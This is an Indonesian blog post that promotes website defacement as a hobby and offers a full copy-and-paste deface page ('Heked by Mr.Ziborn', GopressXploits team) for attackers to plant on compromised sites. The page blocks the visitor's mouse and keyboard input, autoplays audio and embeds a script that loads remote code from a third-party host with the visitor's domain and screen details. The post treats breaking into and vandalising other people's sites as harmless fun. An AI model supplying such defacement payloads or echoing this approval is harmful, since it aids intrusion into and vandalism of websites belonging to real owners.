Jumat, 07 Juli 2017

Download Script Deface Keren [4]

Deface yang berdasarkan kamus UMUM berarti merusakkan; mencemarkan; menggoresi; menghapuskan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan(hack) suatu website baik halaman utama  atau index filenya (Script Deface Atau Shell Deface)  ataupun halaman lain yang masih terkait dalam satu  url dengan website tersebut (bisa di folder atau di file).Deface adalah teknik mengganti atau menyisipkan file (Script Deface Atau Shell Deface) pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.Deface  ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si Defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname dengan macam macam tujuan, ada yang melakukan Deface bertujuan untuk protes dengan kebijakan pemerintah, ada yang Deface cuma sekedar iseng, ada yang Deface akibat galau (:'v abis putus kayaknya) , ada yang Deface bertujuan nembak cewek :'v, macem macem deh :D bagi kami Deface sudah menjadi kehidupan sehari hari, Wkwkwwk

 Berikut Script Nya :
Download Script Deface Keren [4]
Lihat Script Deface Keren [4]


Bisa Langsung Di Copy Dari Pastebin Di Atas Atau Langsung Copy Di Bawah


<head>
<meta name="googlebot" content="all,index,follow">
<meta name="robots" content="index, follow">
<html>
<title>GOPRESSXPLOITS | Mr.Ziborn</title>
<link rel="shortcut icon" href="http://th02.deviantart.net/fs70/PRE/i/2013/087/e/3/evil_rabbit_icon_by_slamiticon-d5z7lkb.png">
<link href='http://fonts.googleapis.com/css?family=Jolly+Lodger' rel='stylesheet' type='text/css'>
<script src="http://e-mete.com/js/kdsnow.js"></script>
</head>
<audio autoplay>
<source src="http://downloadmp3.planetlagu.site/save/01%20Setia%20Band%20Gugur%20Bunga.mp3" type="audio/mpeg">
</audio>
<body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" type="text/css" bgcolor="#010101">
<style type="text/css">
body {
 font-family: 'Jolly Lodger';
 color: white;
 padding: 0;
 margin: 0;
 background-image: url('');
 background-repeat:no-repeat;
 background-position:center;
 background-size: 100% 100%;
}
.GopressXploits_Blink {
-webkit-animation-name: blinker;
-webkit-animation-duration: 2s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;
-moz-animation-duration: 1s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

 animation-name: blinker;
 animation-duration: 1s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;

 color: red;
}

@-moz-keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }

@-webkit-keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }

@keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }
img { 
opacity: 0.8; 
} 
img { 
animation-name: rotate ; 
animation-duration: 5s; 
animation-play-state: running; 
animation-timing-function: linear; 
animation-iteration-count: infinite; 
opacity: 1.0; 
filter: alpha(opacity=50);
} 
img:hover {
opacity: 1.0;filter: alpha(opacity=100);
} 
@keyframes rotate{ 
10% {transform:rotateY(36deg)} 
20% {transform:rotateY(72deg)} 
30% {transform:rotateY(108deg)} 
40% {transform:rotateY(144deg)} 
50% {transform:rotateY(180deg)} 
60% {transform:rotateY(216deg)} 
70% {transform:rotateY(252deg)} 
80% {transform:rotateY(288deg)} 
90% {transform:rotateY(324deg)} 
100% {transform:rotateY(360deg)} 
}
</style>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
  if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
    this.running = true; // Never run.
    return;
  }
  this.element = element;
  this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  this.interval = (typeof interval == "undefined" ? 30 : interval);
  this.origText = this.element.innerHTML;
  this.unparsedOrigText = this.origText;
  this.cursor = (cursor ? cursor : "");
  this.currentText = "";
  this.currentChar = 0;
  this.element.typingText = this;
  if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  TypingText.all.push(this);
  this.running = false;
  this.inTag = false;
  this.tagBuffer = "";
  this.inHTMLEntity = false;
  this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
  for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
  if(this.running) return;
  if(typeof this.origText == "undefined") {
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet.  Have patience.
    return;
  }
  if(this.currentText == "") this.element.innerHTML = "";
  if(this.currentChar < this.origText.length) {
    if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
      this.tagBuffer = "<";
      this.inTag = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
      this.tagBuffer += ">";
      this.inTag = false;
      this.currentText += this.tagBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inTag) {
      this.tagBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
      this.HTMLEntityBuffer = "&";
      this.inHTMLEntity = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
      this.HTMLEntityBuffer += ";";
      this.inHTMLEntity = false;
      this.currentText += this.HTMLEntityBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inHTMLEntity) {
      this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else {
      this.currentText += this.origText.charAt(this.currentChar);
    }
    this.element.innerHTML = this.currentText;
    this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
    this.currentChar++;
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  } else {
 this.currentText = "_";
 this.currentChar = 0;
        this.running = false;
        this.finishedCallback();
  }
}
</script> 
</head>
<br><br><br><br>
<center>
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj24Zr40iqXxJVHTn_u4uxlBOR5T2D2cS0vAU3zYT2f54xg9kSR5HkSR7JLHtIocT60s9mODY2ClMP4gZbBBQ6O2VXSY-hIiqLyqqEE1d48Li6dM2XEVtcXYBAltQReicX2VBMT88fWBQk/s1600/537718460.png" width="270" height="300">
 <div class="GopressXploits_Blink">
 <font face="Jolly Lodger" size="6" color="#FF000E"> Heked <font face="Jolly Lodger" size="6" color="yellow">  by <font face="Jolly Lodger" size="6" color="#1CFF00">  Mr.Ziborn </font></font></font><br>
   </div>
[<marquee behavior="alternate" scrollamount="50" width="250"> <font size="4" color="red">________<font size="4" color="yellow">________<font size="4" color="#1CFF00">________<font size="4" color="#00A7FF">________</font></font></font></font></marquee>]
<br><b>
<font size="5" color="red"> 
Why ??  </font> <br>
<font size="5" color="yellow"> 
Don't Panic Sir </font> <br>
<font size="5" color="#1CFF00"> 
I Just Test </font> <br>
<font size="5" color="#00A7FF"> 
Your Security Site <3 
</font></b>
<br>
[<marquee behavior="alternate" scrollamount="50" width="250"> <font size="4" color="red">________<font size="4" color="yellow">________<font size="4" color="#1CFF00">________<font size="4" color="#00A7FF">________</font></font></font></font></marquee>]
<br><br>
<font face="Jolly Lodger" size="5" color="red"> Greetz  <font face="Jolly Lodger" size="5" color="yellow"> From <font face="Jolly Lodger" size="5" color="#1CFF00"> GopressXploits <font face="Jolly Lodger" size="5" color="#00A7FF"> Team : <font face="Jolly Lodger" size="5" color="#1CFF00">Mr.CeRoS404  , <font face="Jolly Lodger" size="5" color="yellow">M4M3N &  <font face="Jolly Lodger" size="5" color="red"> RESIS-07 ! </font>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKHhQ8UNlT%2bicowX6WKcKBMlcV2SPk3I66hPFw4A7uKvRlKZ29RWmGBGgk6%2bPkO6t%2b%2bZtgQnJQ%2fVwkd6KeMpLEC26dwRXvWtcE8XNAJtQYNOaoNRQcTshMpXcJY%2b%2b8yKDICaCGFS%2fqqDC4eRWqt2MdclCyWZH871kAz%2fsSX2zctMhng163AQ3e3TSRRYD35yPkQp3nnMTx8yFqI6uV%2bzfVX6mm0EeULxLBvAThBJtCytsC42rK79HEkenzuc%2fnJQ9r0KApCgL3I15fLBUaoSkLNC13WMd1D4HoSS9iDtQnsAI6bKY1Gz2Ol2bGKaBbEf5ITdZ%2fAjAtZtLHy%2fdxaZcln6ENNhV9O9kqouVx3Q%2bBsc%2fPcK0hSoR4gncm2k%2fjKfZGKY%2b6BmAT1%2fBYX4M94urwihGN9O8v8DotptDREqOb4pf3Kd5xCbLOeiWDjHFHW%2f3QUnkX%2feo8NHwkyS6tsLcOfttTinfNpcZ9DkVYjKKYJm3avHUDaKnJdKevkxxx%2boF7oY3J0byI2Gse3CgOSzlY6W976qV2CEHtVmw4v7dmh68D6dgiHSH8uA%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
<center>
 <div id="bar" class="GopressXploits_Blink" style="position: fixed; width: 100%; top: 0px; font-family: Inconsolata; height: 20px; color: #ccc; font-size: 13px; left: 0px; border-top: 1px solid #222; padding: 5px; background-color: #222"> 
 <font size="3" color="white" > Shootz : </font><marquee align="center" scrollamount="10" width="560"> <font size="3" color="cyan">Mr.CeRoS404 || M4M3N || RESIS-07 || Kinekaru || Lunatic0de_ || Con7ext || ./Mr.Vangke404 || Maestro404 || Mr.Hydra || ./Wall E || Toxic Mask || GU3LT03M || LCR999X || NotFound007 || Manusia_Malam || WithoutName || Diffmuris || Mr.Perface || LittleJok3r || MR.F4C3B00K.ID || Mr.Shin-art || Mr.z3mBo0d || ./N3t_FiX || F3L312 || Alfaqir151</font></marque>
   </div>
<a href="https://hacanimedream.blogspot.co.id/" target="_blank">Hacanimedream</a>
Try it Yourself »
   <script type="text/javascript">
new TypingText(document.getElementById("sualmukuna_cugh"));
TypingText.runAll();
</script>
   </center>
</html>

Artikel Terkait

2 Comments

Peraturan Dalam Berkomentar
1. Jangan Menggunakan Link Aktif, Jika Menggunakan Maka Akan Otomatis Terhapus
2. Bertanya Dengan Sopan
3. No Spam!
Jika Mau Promosi, Silahkan Namun Sewajarnya Saja!
EmoticonEmoticon